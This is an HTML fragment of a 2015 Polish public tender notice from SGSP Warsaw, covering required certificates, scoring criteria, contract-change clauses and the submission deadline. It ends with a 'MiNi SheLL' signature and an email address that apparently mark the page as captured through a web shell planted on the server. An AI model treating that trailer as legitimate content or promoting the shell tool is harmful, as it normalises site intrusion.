<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z § 13 Istotnych warunków umowy określonych szczegółowo w SIWZ:
Zmiany umowy
1. Strony  dopuszczają  zmianę sposobu wykonania Przedmiotu Umowy, określonego w dokumentach określonych w § 1 ust. 2, spowodowanego: 
1) niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentach określonych w § 1 ust. 2, spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
2) pojawieniem się na rynku nowych materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego Przedmiotu Umowy,
3) koniecznością zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych  i technologicznych niż wskazane w dokumentach określonych w § 1 ust. 2, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy,
4) koniecznością zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany przepisów.
W przypadku wystąpienia którychkolwiek z ww. okoliczności Wykonawca sporządzi protokół konieczności w zakresie robót zamiennych lub protokół konieczności w zakresie robót zaniechanych, który po jego uzgodnieniu z Inspektorami Nadzoru Zamawiającego stanowić będzie podstawę do sporządzenia przez Wykonawcę kosztorysu na roboty zamienne zgodnie z postanowieniami § 7 ust. 8 lub kosztorysu na roboty zaniechane zgodnie z § 7 ust. 6. Tak sporządzone kosztorysy po uprzednim sprawdzeniu i zatwierdzeniu przez Zamawiającego, będą stanowiły podstawę zmiany Wynagrodzenia w formie aneksu do umowy. 
2. Zamawiający dopuszcza zmianę terminu zakończenia Przedmiotu Umowy w następujących przypadkach:
1) jeżeli zajdzie konieczność wprowadzenia zmiany sposobu wykonania Przedmiotu Umowy, o której mowa w ust. 1,
2) jeżeli zmiana jest konieczna z powodu działania siły wyższej tzn. niezwykłych i nieprzewidzianych okoliczności niezależnych od Strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć w szczególności niesprzyjających warunków atmosferycznych i klęsk żywiołowych, katastrofy budowlanej uniemożliwiających terminowe wykonanie Przedmiotu Umowy,
3) w przypadku braku możliwości uzyskania przez Wykonawcę wymaganych uzgodnień, decyzji w terminie umownym z przyczyn niezależnych od Wykonawcy przy zachowaniu przez Wykonawcę należytej staranności.
3. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2  termin wykonania Umowy, o którym mowa  w § 2 ust. 1 pkt 2 może ulec wydłużeniu, po wprowadzeniu stosownych zmian do umowy w formie aneksu do umowy podpisanego przez obie strony. 
W tym przypadku może również ulec zmianie sposób rozliczenia Wynagrodzenia Wykonawcy, o którym mowa w § 7 ust.1.
4. W przypadku konieczności wprowadzenia zmian do Harmonogramu Rzeczowo-
    Terminowego, spowodowanych przyczynami technicznymi lub technologicznymi bez  
    konieczności dokonywania zmiany terminu realizacji umowy, Wykonawca przygotuje 
   zamienny Harmonogram Rzeczowo-Terminowy, który po uzgodnieniu z Zamawiającym 
   stanowić będzie załącznik do umowy.
5. Wprowadzenie zmian, o których mowa w ust. 1 - 2 będzie możliwe pod warunkiem
    potwierdzenia zabezpieczenia odpowiednich środków finansowych.
6.Zmiany terminu, o których mowa w niniejszym paragrafie oraz zmiana sposobu rozliczenia 
   wynagrodzenia Wykonawcy, o której mowa w ust. 3, nie będą skutkowały zmianą  
   Wynagrodzenia Wykonawcy wynikającego z niniejszej umowy z tytułu przedłużenia 
   terminu albo z tytułu zmiany sposobu rozliczenia wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SGSP w Warszawie ul. Słowackiego 52/54  Dział Zamówień Publicznych pok. 323..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2015 godzina 10:00, miejsce: SGSP w Warszawie ul. Słowackiego 52/54  KANCELARIA OGÓLNA pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com